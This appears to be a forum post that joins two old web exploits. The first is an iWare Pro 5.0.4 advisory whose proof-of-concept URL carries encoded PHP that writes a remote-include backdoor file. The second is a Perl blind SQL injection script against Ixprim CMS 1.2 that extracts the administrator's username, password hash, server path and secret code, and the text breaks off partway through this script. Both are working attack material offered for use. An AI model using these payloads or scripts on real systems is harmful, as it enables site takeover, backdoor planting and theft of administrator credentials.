+
+ iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability
+
+ Affected Software .: iWare Professional CMS <= 5.0.4
+ Vendor :
+ Download :
+ Description : "iWare is a Open Source PHP & MySQL Content
Management System"
+ Class : Remote Code Execution
+ Risk : High (Remote Code Execution)
+ Found By : nuffsaid <nuffsaid[at]newbslove.us>
+
+ Details:
+ iWare admin/mods/simplechat_1.0.0/chat_panel.php does not sanatize the
$message variable
+ in the first argument of the PostMessage() function on line 11 before writing the
variable
+ contents to chat_log.php on line 25. When chat_panel.php is requested, the
PostMessage()
+ function is called on line 32 and $_REQUEST['msg'] is written to chat_log.php
unsanatized.
+
+ Vulnerable Code:
+ admin/mods/simplechat_1.0.0/chat_panel.php, line(s) 11-32:
+ -> 11: function PostMessage($message) {
+ -> 16: $new_message = "".$message."<br />\n";
+ -> 23: $open_file = fopen("chat_log.php", "w");
+ -> 25: fputs($open_file, stripslashes($new_message));
+ -> 28: fclose($open_file);
+ -> 29: }
+ -> 32: if($_REQUEST['talk']==1){PostMessage($_REQUEST['msg']);}
+
+ Proof Of Concept:
+
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=[
evilcode]
+ http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php
+ ->
http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=
%3C%3Fphp%0D%0A%24open_file+%3D+fopen%28%22 %2F %2F %2Fevilf
ile.php%22%2C+%22w%22%29%3B%0D%0Afputs%28%24open_file%2C%22
%3C%3Fphp+include%28%5C%24_GET%5B%27evil_include%27%5D%29%3
B+%3F%3E%22%29%3B%0D%0Afclose%28%24open_file%29%3B%0D%0Ac
hmod%28%22 %2F %2F %2Fevilfile.php%22%2C0777%29%3B%0D%0A%3F
%3E
+ -> http://[target]/[path]/admin/mods/simplechat_1.0.0/chat_log.php
+ -> http://[target]/[path]/evilfile.php?evil_include=
+
Black_hat_cr(HCE)
Ixprim CMS 1.2 Remote Blind SQL Injection Exploit
Code:
#!/usr/bin/perl
#
# INFORMATIONS
# ============
# Affected.scr : Ixprim 1.2
# Poc.ID : 16061221
# Type : Blind SQL Injection
# Risk.level : Medium
# Conditions : load_file privilege (ixp code only)
# Src.download : www.ixprim-cms.org
# Poc.link : acid-root.new.fr/poc/16061221.txt
# Credits : DarkFig
#
#
# SCREENSHOT
# ==========
# header> Ixprim 1.2 Remote Blind SQL Injection Exploit
# header> =============================================
# status> Searching if someone posted a comment
# sploit> story_id=2
# status> Searching the administrator's uid
# sploit> 1
# status> Searching the administrator's username length
# sploit> 4
# status> Searching the administrator's username
# sploit> root
# status> Searching the adminitrator's password hash
# sploit> 7b24afc8bc80e548d66c4e7ff72171c5
# status> Searching a full path disclosure
# sploit> /home/www/ixprim-1.2/html/mainfile.php
# status> Searching the confidential ixp code
# sploit> c998aa6188034690aab6565c0099fe0a
#
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Response;
use Getopt::Long;
print STDOUT "\n header> Ixprim 1.2 Remote Blind SQL Injection Exploit";
print STDOUT "\n header>
=============================================\n";
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);
if(!$host) {
print STDOUT " header> Usage : xpl.pl -host [host] -path [path]\n";
print STDOUT " header> Options: -proxh [host] -proxu [user] -proxp [pass]\n";
exit(1);
}
$host = $host !~ /^http:\/\// ? "http://$host" : $host;
$path = defined($path) ? $path : "/";
my $ua = LWP::UserAgent->new();
$ua->agent('r00xzilla');
$ua->timeout(30);
$ua->proxy('[http]' => $proxh) if $proxh;
my $req = HTTP::Request->new(GET => $host.$path.'ixm_ixpnews.php');
$req->proxy_authorization_basic($proxu,$proxp) if $proxu;
$res = ($ua->request($req))->content;
print STDOUT " status> Searching if someone posted a comment\n";
# There is more than one sql injection, but this one is the most
# interesting to exploit. The parameter 'story_id' isn't properly
# sanitised before being used in an SQL query. URL Rewriting option
# supported.
#
if($res =~ /(story_id=||news-art)([0-9]+)(||.html)">([0-9]+)
(commentaire||comment)/) {
$story_id = $2;
$bsql = $host.$path."ixm_ixpnews.php?file=article&story_id=$story_id";
print STDOUT " sploit> story_id=$story_id\n";} else {
print STDOUT " status> No comment posted\n\n";
exit(1);
}
print STDOUT " status> Searching the administrator's uid\n";
$uid =
sendreq(1,1,"select%20uid%20from%20ixp_users%20order%20by%20uid%20lim
it%200,1");
print STDOUT " status> Searching the administrator's username length\n";
$admlg =
sendreq(1,3,"length((select%20uname%20from%20ixp_users%20where%20uid=$
uid))");
print STDOUT " status> Searching the administrator's username\n";
&sendreq(1,$admlg,"select%20uname%20from%20ixp_users%20where%20uid=$
uid");
print STDOUT " status> Searching the adminitrator's password hash\n";
&sendreq(1,32,"select%20pass%20from%20ixp_users%20where%20uid=$uid");
print STDOUT " status> Searching a full path disclosure";
$req = GET $host.$path.'kernel/plugins/fckeditor2/ixprim_api.php';
$res = ($ua->request($req))->content;
if($res =~ /in <b>(.*?)kernel(\/||\\)/) {
$fpd = $1.'mainfile.php';
print STDOUT "\n sploit> $fpd\n";} else {
print STDOUT "\n status> Can't get the full path disclosure";
exit(1);
}
# A personal code who is stored in mainfile.php protect the administration panel
#
# // Code personnel CMS
# define("IXP_CODE", 'c998aa6188034690aab6565c0099fe0a');
#
# This code is generated by the function code() stored in install.fct.php
#
# function code($param='1')
# {
# $number = rand(1,1024);
# $temp = md5(($number*time()).$param);
# $temp = substr($temp, 0, 8);
# return $temp;
# }
#
# $param = $host.$path and $temp can be modified by the user.
# After the request sent, the script create the sql tables and the time()
# when it created them is stored in the mysql database, we can retrieve it with the
sql
# injection and IF the user don't modified the generated code, we can find the
personal code.
# The time during the creation of the table and the generation of the code
# is not the same, but we can try to bruteforce it with some parameters.
# But the user can change the generated code that's why i decided to use the
sql
# injection with load_file and regexp.
#
print STDOUT " status> Searching the confidential ixp code\n";
# Example with "C:/Program Files/EasyPHP1-8/www/ixprim-
1.2/html/mainfile.php"